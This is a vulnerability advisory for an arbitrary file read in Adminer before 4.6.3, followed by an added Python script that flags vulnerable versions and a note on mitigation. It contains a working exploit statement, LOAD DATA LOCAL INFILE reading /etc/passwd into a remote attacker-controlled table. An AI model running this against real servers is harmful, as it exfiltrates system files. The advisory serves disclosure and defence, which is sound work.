CVE-2021-xxxxx - Adminer < 4.6.3 - Arbitrary File Read

  • Title : Adminer < 4.6.3 - Arbitrary File Read
  • Author : @Podalirius
  • CVSS : 7.5 (High)
  • CVSS Vector : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Summary

Improper Access Control in Adminer versions <= 4.6.2 (fixed in version 4.6.3) allows an attacker to achieve Arbitrary File Read on the server hosting Adminer by connecting the Adminer instance to a remote MySQL database under the attacker's control.

Affected products and versions

To exploit this vulnerability, an attacker needs access to the Adminer login page and must connect Adminer back to a remote MySQL database they control. They can then read and exfiltrate local files from the Adminer server using the SQL statement LOAD DATA LOCAL INFILE.

Exploitation

In order to exploit this vulnerability, an attacker needs access to the Adminer login page and connects Adminer back to a remote MySQL database they control:

After this, the attacker goes to the “SQL Command” page on the Adminer:

With the following SQL command, the attacker can read a local file on the Adminer server line by line and load it into their remote database:

LOAD DATA local INFILE '/etc/passwd' INTO TABLE lfr_sink_table fields TERMINATED BY "\n";

Once this is done, the attacker can view the contents of the read file with SELECT * FROM lfr_sink_table;

All Adminer versions from 1.12.0 to 4.6.2 (inclusive) are vulnerable:

Adminer vulnerable versions

Mitigations

In order to fix this vulnerability you need to update Adminer to the latest version, or at least to version 4.6.3. This vulnerability was fixed by the vendor in version 4.6.3.
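The following script is an added example for inventorying exposed Adminer instances against the version range stated above; it is not part of the original advisory or of the Adminer project. It compares a version string against the affected range (1.12.0 up to and including 4.6.2, fixed in 4.6.3) and, as an assumption about the UI, extracts the version from a banner of the form "Adminer X.Y.Z" in a page body. The HTML snippets below are constructed samples for offline use.

```python
import re
from typing import Optional, Tuple

# Range stated in the advisory: 1.12.0 .. 4.6.2 inclusive are vulnerable,
# 4.6.3 is the first fixed release.
FIRST_VULNERABLE = (1, 12, 0)
FIXED_IN = (4, 6, 3)

# Assumption: the Adminer UI prints a banner such as "Adminer 4.6.2" somewhere
# in the page; the regex tolerates two- or three-part versions.
BANNER_RE = re.compile(r"Adminer\s+(\d+(?:\.\d+){1,2})\b")


def parse_version(text: str) -> Tuple[int, int, int]:
    """Turn '4.6.2' or '4.6' into a 3-tuple so versions compare numerically."""
    parts = text.strip().split(".")
    if not 1 <= len(parts) <= 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a dotted numeric version: {text!r}")
    nums = [int(p) for p in parts]
    nums += [0] * (3 - len(nums))
    return nums[0], nums[1], nums[2]


def is_vulnerable(version: str) -> bool:
    """True when the version falls inside the advisory's affected range."""
    return FIRST_VULNERABLE <= parse_version(version) < FIXED_IN


def extract_version(html: str) -> Optional[str]:
    """Pull the version out of the (assumed) 'Adminer X.Y.Z' banner, if any."""
    match = BANNER_RE.search(html)
    return match.group(1) if match else None


def assess(html: str) -> dict:
    """Classify one captured page: version found, vulnerable or not, and why."""
    version = extract_version(html)
    if version is None:
        return {"version": None, "vulnerable": None,
                "reason": "no Adminer version banner found; check manually"}
    vulnerable = is_vulnerable(version)
    reason = ("LOAD DATA LOCAL INFILE file read, upgrade to >= 4.6.3"
              if vulnerable else "outside affected range 1.12.0..4.6.2")
    return {"version": version, "vulnerable": vulnerable, "reason": reason}


# Constructed sample pages (not real Adminer output) used to exercise assess().
SAMPLE_VULNERABLE = '<p id="version">Adminer 4.6.2</p><title>Login - Adminer</title>'
SAMPLE_FIXED = '<p id="version">Adminer 4.6.3</p>'
SAMPLE_UNKNOWN = '<title>Login</title>'

if __name__ == "__main__":
    for page in (SAMPLE_VULNERABLE, SAMPLE_FIXED, SAMPLE_UNKNOWN):
        print(assess(page))
```

Feed `assess()` the body of each Adminer login page you are responsible for and upgrade anything it flags. Independently of the Adminer upgrade, PHP's `mysqli.allow_local_infile` ini directive (off by default since PHP 7.2.16 and 7.3.3) disables LOAD DATA LOCAL on the client side for every mysqli consumer on the host; that is a general mysqli setting, not something the advisory itself states.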

References